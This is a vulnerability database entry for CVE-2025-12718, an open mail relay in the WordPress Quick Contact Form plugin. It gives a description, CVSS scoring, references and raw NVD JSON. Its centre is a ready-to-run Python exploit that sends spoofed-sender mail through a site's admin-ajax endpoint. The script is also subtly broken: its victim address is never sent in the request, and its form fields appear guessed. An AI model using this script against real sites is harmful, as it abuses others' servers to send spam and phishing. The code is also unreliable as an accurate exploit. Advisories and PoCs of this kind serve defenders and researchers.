CVE-2025-12718

Description

The Quick Contact Form plugin for WordPress is vulnerable to Open Mail Relay in all versions up to, and including, 8.2.6. This is due to the 'qcf_validate_form' AJAX endpoint allowing a user controlled parameter to set the 'from' email address. This makes it possible for unauthenticated attackers to send emails to arbitrary recipients utilizing the server. The information is limited to the contact form submission details.

CVSS Details

CVSS Score

5.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Quick Contact Form <= 8.2.6 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 # CVE-2025-12718 PoC - WordPress Quick Contact Form Open Mail Relay # This PoC demonstrates the Open Mail Relay vulnerability in Quick Contact Form <= 8.2.6 import requests import sys def exploit_cve_2025_12718(target_url, attacker_email, victim_email): """ Exploit the Open Mail Relay vulnerability in Quick Contact Form plugin. Args: target_url: Target WordPress site URL (e.g., https://example.com) attacker_email: Email address to set as the 'from' address victim_email: Target recipient email address """ # WordPress AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Prepare the malicious request data # The 'action' parameter must match the registered AJAX action name data = { 'action': 'qcf_validate_form', 'form_email': attacker_email, # User-controlled 'from' email address 'form_subject': 'Test Message', 'form_message': 'This is a test email sent via Open Mail Relay vulnerability', 'your-name': 'Attacker', 'your-email': attacker_email, 'your-subject': 'Test', 'your-message': 'Exploitation attempt' } # Additional headers to make the request look legitimate headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' } try: print(f"[*] Targeting: {target_url}") print(f"[*] Spoofed From: {attacker_email}") print(f"[*] Target Recipient: {victim_email}") print(f"[*] Sending malicious request...") response = requests.post(ajax_url, data=data, headers=headers, timeout=30) if response.status_code == 200: print(f"[+] Request sent successfully!") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python3 cve-2025-12718.py <target_url> <attacker_email> <victim_email>") print("Example: python3 cve-2025-12718.py https://victim.com [email protected] [email protected]") sys.exit(1) target = sys.argv[1] attacker = sys.argv[2] victim = sys.argv[3] exploit_cve_2025_12718(target, attacker, victim)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12718
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12718
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12718/
[4] VulDB https://vuldb.com/cve/CVE-2025-12718
[5] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3433286%40quick-contact-form&new=3433286%40quick-contact-form&sfp_email=&sfph_mail=
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/dc7ba538-a7ee-48c8-996c-b8db1934fdeb?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12718", "sourceIdentifier": "[email protected]", "published": "2026-01-17T03:16:03.037", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Quick Contact Form plugin for WordPress is vulnerable to Open Mail Relay in all versions up to, and including, 8.2.6. This is due to the 'qcf_validate_form' AJAX endpoint allowing a user controlled parameter to set the 'from' email address. This makes it possible for unauthenticated attackers to send emails to arbitrary recipients utilizing the server. The information is limited to the contact form submission details."}, {"lang": "es", "value": "El plugin Quick Contact Form para WordPress es vulnerable a Open Mail Relay en todas las versiones hasta la 8.2.6, inclusive. Esto se debe a que el endpoint AJAX 'qcf_validate_form' permite que un parámetro controlado por el usuario establezca la dirección de correo electrónico 'from'. Esto hace posible que atacantes no autenticados envíen correos electrónicos a destinatarios arbitrarios utilizando el servidor. La información se limita a los detalles de envío del formulario de contacto."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3433286%40quick-contact-form&new=3433286%40quick-contact-form&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dc7ba538-a7ee-48c8-996c-b8db1934fdeb?source=cve", "source": "[email protected]"}]}}